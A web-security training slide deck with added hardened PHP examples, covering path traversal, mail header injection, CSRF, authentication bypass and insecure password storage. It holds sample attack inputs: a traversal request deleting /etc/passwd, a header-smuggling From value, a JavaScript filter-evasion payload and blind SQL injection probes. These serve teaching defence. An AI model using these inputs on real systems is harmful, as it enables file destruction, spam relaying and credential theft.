Actual, with GET /del.php?user=../etc&file=passwd: delete any file on disk that PHP has permission to access.
<?php
$username = "../etc";
$homedir = "/home/../etc";
$file_to_delete = "passwd";
unlink("/home/../etc/passwd");
echo "/home/../etc/passwd has been deleted!";
?>
Slide 77:
Right: take the username from the authentication layer and strip any path from the file name.
<?php
$username = $_SERVER['REMOTE_USER'];          // set by the web server's authentication, not by the user
$homedir = "/home/$username";
$file_to_delete = basename($userfile);        // drops the directory part: ../etc/passwd becomes passwd
unlink("$homedir/$file_to_delete");
$fp = fopen("/home/logging/filedelete.log", "a+");   // record the deletion
$logstring = "$username $homedir $file_to_delete\n";
fwrite($fp, $logstring);
fclose($fp);
echo "$file_to_delete has been deleted!";
?>
Better: reject anything that is not a plain file name before touching the filesystem.
<?php
$username = $_SERVER['REMOTE_USER'];          // use the authentication mechanism
$homedir = "/home/$username";
// no leading dot or slash, no slash anywhere (the slide used ereg(), removed in PHP 7)
if (!preg_match('#^[^./][^/]*$#', $userfile)) die('bad filename');   // stop executing
if (!preg_match('#^[^./][^/]*$#', $username)) die('bad username');   // stop executing
?>
Slide 78: And: give the user account PHP runs as only very limited permissions, so that even a successful traversal reaches nothing outside the web tree.
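One helper that serves both the include of slide 74 and the delete of slides 76 to 78, as an added example that is not code from the deck: the requested name is resolved inside a fixed base directory and anything that escapes it is refused before include() or unlink() run, so "../etc/passwd" and "http://evil.hacker.org/…" never reach the filesystem call. Directory names, the scratch files and the username pattern are constructed for the demo; the code needs PHP 8.

```php
<?php
// Added example, not from the original deck. Paths, scratch files and the username rule
// are constructed for the demo.

/**
 * Canonical absolute path of $name inside $baseDir, or null if it does not exist or
 * would lie outside $baseDir (traversal, absolute path, symlink pointing elsewhere).
 */
function resolveInside(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false) { return null; }
    // basename() alone (slide 77) stops "../" but not a symlink that points elsewhere;
    // realpath() follows the link and the prefix check below catches the escape.
    $target = realpath($base . DIRECTORY_SEPARATOR . basename($name));
    if ($target === false) { return null; }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return str_starts_with($target, $prefix) ? $target : null;
}

// Slide 74, hardened: the page name is a key into a whitelist AND the file must resolve
// inside the pages directory; a URL can never satisfy either condition.
function includePage(string $pagesDir, string $key): bool
{
    $pages = ['contact' => 'contact.php', 'help' => 'help.php', 'query' => 'query.php'];
    if (!array_key_exists($key, $pages)) { return false; }
    $path = resolveInside($pagesDir, $pages[$key]);
    if ($path === null) { return false; }
    include $path;
    return true;
}

// Slides 76-78, hardened: username from the authentication layer (validated anyway),
// file confined to that user's home directory, every deletion logged.
function deleteUserFile(string $homeRoot, string $username, string $file, string $log): bool
{
    if (!preg_match('/\A[a-z_][a-z0-9_-]{0,31}\z/', $username)) { return false; }
    $path = resolveInside($homeRoot . DIRECTORY_SEPARATOR . $username, $file);
    if ($path === null || !is_file($path)) { return false; }
    $ok = unlink($path);
    file_put_contents($log, date('c') . " $username " . basename($path) . ($ok ? ' deleted' : ' failed') . "\n", FILE_APPEND);
    return $ok;
}

// Demo on a scratch directory (constructed).
$root = sys_get_temp_dir() . '/demo_home_' . getmypid();
mkdir("$root/joe", 0700, true);
touch("$root/joe/notes.txt");
touch("$root/secret.txt");                                                      // outside joe's home

var_dump(deleteUserFile($root, 'joe', 'notes.txt', "$root/delete.log"));       // bool(true)
var_dump(deleteUserFile($root, 'joe', '../secret.txt', "$root/delete.log"));   // bool(false): basename() -> secret.txt, not in joe's home
var_dump(deleteUserFile($root, '../etc', 'passwd', "$root/delete.log"));       // bool(false): username rejected
var_dump(file_exists("$root/secret.txt"));                                      // bool(true): untouched
```

realpath() returns false for a file that does not exist, which is why the helper is only usable for existing targets; for a path that is about to be created, validate the parent directory the same way and then append a basename()-stripped file name.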
Slide 79: A contact form that passes the user-supplied address straight into the mail headers.
<?php
$to = 'nobody@example.com';
$subject = 'the subject';
$message = 'hello';
$from = $_POST['from'];
mail($to, $subject, $message, $from);
?>
Normal use: POST from=[email_address] → To: [email_address] / Subject: the subject / From: [email_address]
Slide 80: Mail header injection. Headers are separated by line breaks, so a From value that contains them adds headers of the attacker's choosing:
POST from=fake@example.org
Bcc:evil@example.com
Reply-To:evil2@example.com
Resulting message: To: [email_address] / Subject: the subject / From: fake@example.org / Bcc: evil@example.com / Reply-To: evil2@example.com … The server now relays mail to any address the attacker names.
Slide 81:
Right: refuse a From value that contains non-printable characters (carriage return and line feed included).
<?php
$to = 'nobody@example.com';
$subject = 'the subject';
$message = 'hello';
$from = $_POST['from'];
if (!ctype_print($from)) {
    print "Error post ";
} else {
    mail($to, $subject, $message, $from);
}
?>
Better: also log the attempt.
<?php
$to = 'nobody@example.com';
$subject = 'the subject';
$message = 'hello';
$from = $_POST['from'];
if (!ctype_print($from)) {
    write_logs($_SERVER['REMOTE_ADDR'], $from);   // write_logs: the site's own logging routine
    print "Your IP has been logged... ";
} else {
    mail($to, $subject, $message, $from);
}
?>
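The hardened version of the mail() call of slides 79 to 81, as an added example rather than code from the deck: the From value is rejected on any CR or LF (what the injection on slide 80 relies on), validated as a single address, and only then placed in an explicit From: header. The write_logs helper, the mailer closure and the sample inputs are constructed for the demo.

```php
<?php
// Added example, not from the original deck. write_logs, the dummy mailer and the inputs
// are constructed for the demo.

function safeFromHeader(string $from): ?string
{
    // A header ends at CRLF; any CR or LF in user data terminates the From header and
    // starts attacker-controlled ones (Bcc:, Reply-To:, ...). Reject, do not strip.
    if (preg_match('/[\r\n]/', $from)) { return null; }
    if (filter_var($from, FILTER_VALIDATE_EMAIL) === false) { return null; }
    return 'From: ' . $from;
}

function write_logs(string $ip, string $message): void
{
    // control characters are escaped so the log line itself cannot be forged
    error_log("[mail-injection] $ip: " . addcslashes($message, "\0..\37"));
}

function sendContact(string $fromInput, string $ip, callable $mailer): bool
{
    $header = safeFromHeader($fromInput);
    if ($header === null) {
        write_logs($ip, $fromInput);      // slide 81, "Better": record the attempt
        return false;
    }
    return $mailer('nobody@example.com', 'the subject', 'hello', $header);
}

// In production $mailer is PHP's mail(); a closure here so the demo runs without an MTA.
$dummyMailer = function (string $to, string $subject, string $msg, string $headers): bool {
    echo "would send to $to with headers: $headers\n";
    return true;
};

var_dump(sendContact('wong@example.org', '203.0.113.5', $dummyMailer));              // bool(true)
var_dump(sendContact("fake@example.org\r\nBcc:evil@example.com\r\nReply-To:evil2@example.com",
                     '203.0.113.5', $dummyMailer));                                   // bool(false), attempt logged
```

The deck's ctype_print() check already rejects CR and LF; the added address validation also stops a value such as "a@b.c, evil@example.com", which is printable but would still add a recipient.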
Slide 82: Intrusion techniques and defenses: CSRF
Slide 84: Stored script turned into a cross-site request.
1. The attacker posts a message containing malicious code (Post Forum Message: subject 免费赠送奥运门票 !!! "Free Olympic tickets!!!", body <script> attack code </script>). 2. The database stores it (alongside the other threads: 姚明…, 刘翔…, 郑智…, 郭晶晶…, 中国队…). 3. A user logs in (login → web page + cookies). 4. The user opens the thread (GET /forum.php?fid=122&mid=241). 5. The browser executes the script. 6. The script performs dangerous operations on the user's behalf: its requests carry the user's cookies and originate from the trusted domain (192.168.1.10), so the server accepts them as the user's own.
Slide 85: Filter evasion on Myspace, the path the worm took past the filter:
Post <div style="background:url()"> → accepted (Cool!).
The filter blocks <script.*>, onclick, <a href=javascript://> …
Post <div style="background:url('javascript:evil()')"> → blocked.
Post <div style="background:url('java script:evil()')"> → blocked.
Post <div style="background:url('java&#58script:evil()')"> → accepted: Cool!!! Hello, web worm!
The filter matches fixed strings, while the browser decodes the value before interpreting it, so any encoding the filter did not anticipate gets through.
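A CSRF defense for the state-changing request on slide 84, as an added example that is not code from the deck: every request that changes state must carry a secret that a page on another origin cannot read, a per-session token compared in constant time. The session is an array here so the demo runs from the command line; in a web request the same functions work on $_SESSION, with session.cookie_httponly and session.cookie_samesite set.

```php
<?php
// Added example, not from the original deck. $session stands in for $_SESSION so the
// demo runs from the CLI; the forum post is constructed.

function csrfToken(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));   // CSPRNG, not md5(uniqid(rand()))
    }
    return $session['csrf'];
}

function csrfCheck(array $session, array $post): bool
{
    $sent = $post['csrf'] ?? '';
    return is_string($sent) && isset($session['csrf'])
        && hash_equals($session['csrf'], $sent);         // constant-time comparison
}

// Emitted into every state-changing form; script from another origin cannot read it.
function hiddenField(array &$session): string
{
    return '<input type="hidden" name="csrf" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '">';
}

// The forum's "post message" handler: token first, then the action.
function postMessage(array $session, array $post): string
{
    if (!csrfCheck($session, $post)) {
        return 'rejected: missing or bad CSRF token';
    }
    return 'posted: ' . htmlspecialchars($post['subject'] ?? '', ENT_QUOTES, 'UTF-8');
}

$session = [];
echo hiddenField($session), "\n";                                                      // goes into the real form
echo postMessage($session, ['subject' => 'hello', 'csrf' => $session['csrf']]), "\n";  // posted: hello
// A forged request from another origin carries the victim's cookie but not the token:
echo postMessage($session, ['subject' => '免费赠送奥运门票 !!!']), "\n";                 // rejected
echo postMessage($session, ['subject' => 'x', 'csrf' => str_repeat('0', 64)]), "\n";    // rejected
```

The token defends against a request forged from a different origin. It does not help against the script on slide 84, which runs inside the forum's own origin and can read the form; that case is the XSS problem of the earlier section and is solved by output escaping, not by CSRF tokens.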
Slide 86: Intrusion techniques and defenses: Configuration errors
Slide 87: Backup files left in the web root. GET /config/horde.php.bak is served as plain text and returns the configuration source, database credentials included:
...
$conf['prefs']['driver'] = 'sql';
$conf['prefs']['params'] = array();
$conf['prefs']['params']['phptype'] = 'mysql';
$conf['prefs']['params']['hostspec'] = 'foo.bar';
$conf['prefs']['params']['username'] = 'root';
$conf['prefs']['params']['password'] = 'blabla';
$conf['prefs']['params']['database'] = 'horde';
$conf['prefs']['params']['table'] = 'horde_prefs';
...
Slide 88: Wrong (figure only). Slide 89: Right (figure only).
Slide 90: Required php.ini settings:
register_globals = Off
allow_url_fopen = Off
magic_quotes_gpc = Off
magic_quotes_runtime = Off
safe_mode = On
open_basedir = /servers/www/foo.bar/
display_errors = Off
log_errors = On
error_log = /var/log/php.log
session.use_trans_sid = 0
expose_php = Off
(register_globals, magic_quotes and safe_mode were deprecated in PHP 5.3 and removed in 5.4; on current versions the remaining directives are the ones that matter.)
Slide 91: Intrusion techniques and defenses: Authentication flaws
Slide 92: Authentication bypass through register_globals. POST with a wrong username or password → "wrong username or password" (GET /login.php: user / password / OK / Cancel). Then GET /script.php?authorized=1 → "Successfully logged in…": the query parameter initialises the $authorized variable that the script only sets itself on success.
Slide 93:
Wrong (with register_globals on, ?authorized=1 pre-sets the flag):
<?php
if (authenticated_user()) {
    $authorized = true;
}
if ($authorized) {             // never initialised when authentication fails
    include '/highly/sensitive/data.php';
}
...
?>
Right (state kept only in the session and initialised before use):
<?php
$_SESSION['authenticated'] = false;
if (authenticate_user()) {
    $_SESSION['authenticated'] = true;
}
if (!$_SESSION['authenticated']) {
    die("Authorization required");
}
...
?>
Slide 94:
Better: alert the administrator when an unauthorised request reaches the protected code.
<?php
$_SESSION['authenticated'] = false;
if (authenticate_user()) {
    $_SESSION['authenticated'] = true;
}
if (!$_SESSION['authenticated']) {
    mail("admin@example.com", "Possible breakin attempt", $_SERVER['REMOTE_ADDR']);
    echo "Security violation, Admin has been alerted.";
    exit;
}
...
?>
And advise: register_globals = off, and error_reporting(E_ALL), so that an uninitialised variable such as $authorized is reported instead of silently defaulting.
Slide 95:
Wrong: a session identifier that is a counter is trivially guessable.
<?php
if (!isset($_SESSION['session_id'])) {
    $_SESSION['session_id'] = 1;
} else {
    $_SESSION['session_id']++;
}
print "we can guess it";
?>
Right: let PHP generate the identifier and regenerate it whenever the session's privilege level changes.
<?php
session_start();
if (!isset($_SESSION['session_id'])) {
    $_SESSION['session_id'] = 1;
} else {
    session_regenerate_id();
}
?>
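Slides 93 to 95 combined into one login flow, as an added example that is not code from the deck: authentication state lives only in the session, the session id is regenerated at login so an id the attacker planted or guessed beforehand is worthless, and the session cookie is locked down. authenticate_user() is the deck's placeholder; the credential store behind it is constructed here, and the script only runs under a web SAPI because it uses real sessions.

```php
<?php
// Added example, not from the original deck. The user store is constructed; runs under a
// web server, not the CLI, because it manages a real session cookie.

ini_set('session.use_strict_mode', '1');   // refuse session ids the server did not issue
ini_set('session.use_only_cookies', '1');  // no ?PHPSESSID=... in URLs (slide 90: use_trans_sid = 0)
session_set_cookie_params([
    'httponly' => true,                    // script in the page cannot read the cookie (slide 84)
    'secure'   => true,                    // only sent over HTTPS (the sniffing of slides 106-111)
    'samesite' => 'Lax',
]);
session_start();

function authenticate_user(string $user, string $password): bool
{
    // Constructed store; a real one keeps password_hash() output in the database.
    static $users = null;
    $users ??= ['admin' => password_hash('jjyy@!&1', PASSWORD_DEFAULT)];
    return isset($users[$user]) && password_verify($password, $users[$user]);
}

function login(string $user, string $password): bool
{
    $_SESSION['authenticated'] = false;
    if (!authenticate_user($user, $password)) {
        mail('admin@example.com', 'Possible breakin attempt', $_SERVER['REMOTE_ADDR']);  // slide 94
        return false;
    }
    session_regenerate_id(true);           // new id, old one destroyed: ends session fixation
    $_SESSION['authenticated'] = true;
    $_SESSION['user'] = $user;
    return true;
}

function requireAuth(): void
{
    if (empty($_SESSION['authenticated'])) {   // nothing from the query string can set this (slide 92)
        http_response_code(403);
        exit('Authorization required');
    }
}

if (isset($_POST['user'], $_POST['password'])) {
    echo login((string) $_POST['user'], (string) $_POST['password']) ? 'ok' : 'Authorization required';
    exit;
}
requireAuth();
include '/highly/sensitive/data.php';
```

session_regenerate_id(true) is the operation the deck's "Right" code on slide 95 gestures at; calling it at the moment privilege changes, rather than on every request, is what closes the fixation window without breaking concurrent requests.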
Slide 96: Intrusion techniques and defenses: Insecure storage
Slide 97: Blind injection against plaintext storage.
GET /query.asp?name=admin and 1=(select count(*) from admin where id=1 and mid(password,1,1)='a') → TRUE
GET /query.asp?name=admin and 1=(select count(*) from admin where id=1 and mid(password,2,1)='r') → FALSE
…
1. Find the injection point. 2. Probe the database structure (MSSQL Server, table admin, column username…). 3. Probe the username and password length. 4. Probe the password: admin@#$%! comes out in clear.
Slide 98: The same attack against hashed storage.
GET /query.asp?name=admin and 1=(select count(*) from admin where id=1 and mid(password,1,1)='1') → TRUE
GET /query.asp?name=admin and 1=(select count(*) from admin where id=1 and mid(password,2,1)='r') → FALSE
…
1. Find the injection point. 2. Probe the database structure (MSSQL Server, table admin, column username…). 3. Probe the username and password length. 4. Probe the password: all the attacker recovers is the hash 120a1b2649c88aef29edd2ffd7359d73, which still has to be cracked before it is usable.
Slide 99: A database file that can be downloaded directly. GET /config/database.mdb → Database.mdb: Username | password: Admin | admin@#$%! …
Slide 100: The same download against hashed storage. GET /config/database.mdb → Database.mdb: Username | password: Admin | 120a1b2649c88aef29edd2ffd7359d73 …
Slide 101: Wrong: admin@#$%! stored in clear. Right: only the hash 0x120a1b2649c88aef29edd2ffd7359d73 is stored.
Slide 102: Right (as presented): store a hash rather than the password, and compare hashes at login.
<?php
// store the password hash
$query = sprintf("INSERT INTO users(name,pwd) VALUES('%s','%s');",
                 addslashes($username), md5($password));
$result = pg_query($connection, $query);
// send the query that verifies the user's password
$query = sprintf("SELECT 1 FROM users WHERE name='%s' AND pwd='%s';",
                 addslashes($username), md5($password));
$result = pg_query($connection, $query);
if (pg_num_rows($result) <= 0) {
    echo "Authentication failed for $username.";
}
?>
Caveats: an unsalted MD5 is reversed by precomputed tables, so a salted slow hash (password_hash()) is the current advice; and addslashes() is not the escaping PostgreSQL expects (use pg_escape_string(), or better, bound parameters with pg_query_params()).
Slide 103: Cookie values: md5(uniqid(rand(), true)) is better than md5(uniqid(rand())), because the second argument adds entropy from the combined LCG; neither is a cryptographic random source, and anything that acts as a secret should come from random_bytes() (PHP 7 and later).
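Slides 102 and 103 brought up to current practice, as an added example that is not code from the deck: password_hash()/password_verify() (salted, deliberately slow) with bound parameters via pg_query_params() in place of md5()+addslashes(), and random_bytes() in place of md5(uniqid(rand(), true)) for tokens. The PostgreSQL connection and the users table are assumed to exist; the last three lines run without a database.

```php
<?php
// Added example, not from the original deck. $connection and the users(name, pwd) table
// are assumed; pwd must be wide enough for a bcrypt string (60 characters today).

function registerUser($connection, string $username, string $password): bool
{
    $hash = password_hash($password, PASSWORD_DEFAULT);   // bcrypt with its own random salt
    $res  = pg_query_params($connection,
        'INSERT INTO users (name, pwd) VALUES ($1, $2)', [$username, $hash]);
    return $res !== false;
}

function verifyUser($connection, string $username, string $password): bool
{
    $res = pg_query_params($connection, 'SELECT pwd FROM users WHERE name = $1', [$username]);
    $row = $res ? pg_fetch_assoc($res) : false;
    // Verify against a dummy hash when the user is unknown so that response time does not
    // reveal which usernames exist.
    static $dummy = null;
    $dummy ??= password_hash('dummy', PASSWORD_DEFAULT);
    $stored = $row['pwd'] ?? $dummy;
    $ok = password_verify($password, $stored);
    if ($ok && $row && password_needs_rehash($stored, PASSWORD_DEFAULT)) {
        // transparently upgrade hashes when the default algorithm or cost changes
        pg_query_params($connection, 'UPDATE users SET pwd = $1 WHERE name = $2',
            [password_hash($password, PASSWORD_DEFAULT), $username]);
    }
    return $ok && $row !== false;
}

// Slide 103: a "remember me" or reset token must be unpredictable, not derived from the
// clock and rand(); 32 random bytes give 256 bits of entropy.
function newToken(): string
{
    return bin2hex(random_bytes(32));
}

// What ends up in the database: the attacker of slides 97-100, who dumps the table or
// probes it blind, gets a per-user salted bcrypt hash, not admin@#$%! and not a plain
// MD5 that a lookup table reverses.
echo password_hash('admin@#$%!', PASSWORD_DEFAULT), "\n";                                 // $2y$10$... (differs each run)
var_dump(password_verify('admin@#$%!', password_hash('admin@#$%!', PASSWORD_DEFAULT)));   // bool(true)
echo newToken(), "\n";
```

Two hashes of the same password differ because each carries its own salt, which is what defeats the precomputed tables that reverse the deck's unsalted MD5; the cost factor makes each guess slow, which is what limits the brute force after a dump.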
Slide 104: Session: set session.save_path in php.ini to a directory owned by this site and readable by nobody else, rather than leaving session files in the shared default temporary directory where other local users can read them.
Slide 105: Intrusion techniques and defenses: HTTP data transport
Slide 106: The client logs in to the forum (Post Forum Message: username aa, password aa_passwd) over plain HTTP; the web server answers "login successful, welcome aa…".
Slide 107: An attacker on the network path sees exactly the same request and response, credentials included: "log in to the forum, username aa, password aa_passwd" / "login successful, welcome aa…".
Slide 108: Over an encrypted link (labelled WAP on the slide) the attacker captures only ciphertext such as qfw2k3vkei5vinev, faj2fk42iio 9fj1kjfajffj fkajlkfiefi2hffkfkff; the client and server still exchange the login and the welcome in clear between themselves.
Slide 109: The client logs in to the forum (Post Forum Message: username aa, password aa_passwd) and the web server answers "login successful, welcome aa…".
Slides 110-111: Active attack on the local network. A client infected with ARP-spoofing malware ("ARP virus") inserts itself between the victim and the web server and injects <script> evil code </script> into the forum's login page and into the "login successful, welcome aa…" response; the victim's browser executes it. Evil: attacked!
Slide 112: Intrusion techniques and defenses: Access control flaws
Slide 113: Access control by obscurity. GET /afalkjfla/admin123.php → "Admin interface login successful, welcome home admin…": the back-end page is hidden behind a random-looking path but enforces no authentication of its own.
Slides 114-115: The blind injection of slide 60 recovers the administrator password.
GET /query.asp?name=joe' and LEFT(password,1)='m → FALSE
GET /query.asp?name=joe' and LEFT(password,1)='i → TRUE
GET /query.asp?name=joe' and LEFT(password,2)='f → FALSE
…
1. Find the injection point. 2. Probe the password length: 13 characters. 3. Probe the password: ilovepassword. 4. Find the back-end login page: an admin URL that is merely unguessable, or guessable, is where a leaked credential turns into full control.
Slide 116: Intrusion techniques and defenses: The Web 2.0 era
Slide 117: Web 1.0: the user's browser renders HTML + CSS, sends an HTTP request to the web server, which queries the database. Web 2.0: the browser also runs JavaScript, sends XML HTTP requests (Ajax) to a web or XML service, which queries the database. The client now executes code and talks to several back ends, so the APIs and the XML exchanged with them are part of the attack surface.
Slide 118: A crossdomain.xml that allows every domain:
<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>
With this policy, Flash content on any site can make credentialed requests to the Open API and read the responses: the API is vulnerable. List the specific domains that need access instead of "*".
Slide 119: Attack versus defense
Slide 120: Efforts on every side. The open-source community: PHP has deprecated register_globals, magic_quotes and safe_mode … Security vendors: 绿盟 (NSFOCUS) and 极光, leader in vulnerability protection. Software vendors: Microsoft, Google.
Slide 121: NSFOCUS professional services: code audit service, penetration testing service
Slide 122: Code audit service. The NSFOCUS security team audits source code with white-box testing, identifies programming defects, and provides remediation advice and secure coding best practices. Before the audit (no escaping, passwords stored in clear):
<?php
$query = sprintf("INSERT INTO users(name,pwd) VALUES('%s','%s');", $username, $password);
$result = pg_query($connection, $query);
// send the query that verifies the user's password
$query = sprintf("SELECT 1 FROM users WHERE name='%s' AND pwd='%s';", $username, $password);
$result = pg_query($connection, $query);
if (pg_num_rows($result) <= 0) {
    echo "Authentication failed for $username.";
}
?>
Slide 123: Code audit service. After the audit (input escaped, password hashed):
<?php
$query = sprintf("INSERT INTO users(name,pwd) VALUES('%s','%s');",
                 addslashes($username), md5($password));
$result = pg_query($connection, $query);
// send the query that verifies the user's password
$query = sprintf("SELECT 1 FROM users WHERE name='%s' AND pwd='%s';",
                 addslashes($username), md5($password));
$result = pg_query($connection, $query);
if (pg_num_rows($result) <= 0) {
    echo "Authentication failed for $username.";
}
?>
Slide 124: Penetration testing service. The NSFOCUS Pen-test Team uses a range of techniques and methods to simulate attacks against the systems the customer has authorised, verifies the protective measures in place, identifies the points of risk, and provides actionable security advice. (Pen-test Team → Web Server: Pentest, Pentest, Pentest … Succeed, Succeed, Succeed)
Slide 125: This ad space is for rent. Contact 68730606-8502. Interviews in descending order of bid…
Slide 127: Professional Security Solution Provider. Thanks!
